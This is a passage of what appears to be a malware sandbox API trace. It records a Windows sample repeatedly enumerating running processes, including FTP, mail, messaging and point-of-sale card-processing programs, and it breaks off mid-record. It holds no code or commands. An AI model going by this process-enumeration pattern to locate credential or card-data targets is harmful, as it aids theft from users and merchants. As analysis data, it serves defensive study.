[0283.048] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0283.050] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0283.052] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0283.054] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0283.055] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0283.057] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0283.058] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0283.062] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0283.064] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0283.065] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0283.066] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0283.068] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0283.069] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0283.071] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0283.072] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0283.073] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0283.078] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0283.079] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0283.081] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0283.082] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0283.084] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0283.086] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0283.088] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0283.147] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0283.149] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0283.151] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0283.152] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0283.157] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0283.159] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0283.160] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0283.162] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0283.163] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0283.165] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0283.167] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0283.171] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0283.173] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0283.175] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0283.177] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0283.178] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0283.180] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0283.181] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0283.183] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0283.193] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0283.195] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0283.196] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0283.198] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0283.200] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0283.204] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0283.206] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0283.207] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0283.209] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0283.210] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0283.212] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0283.213] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0283.215] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0283.219] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0283.221] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0283.223] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0283.224] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0283.226] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.227] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.229] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0283.230] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.398] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0283.400] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0283.402] CloseHandle (hObject=0x2170) returned 1 [0283.402] Sleep (dwMilliseconds=0x64) [0283.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0283.565] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.567] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0283.569] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0283.571] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.573] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0283.578] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.580] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0283.581] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0283.583] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0283.585] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.587] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.589] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0283.611] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.613] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.615] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.617] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.619] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.621] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, 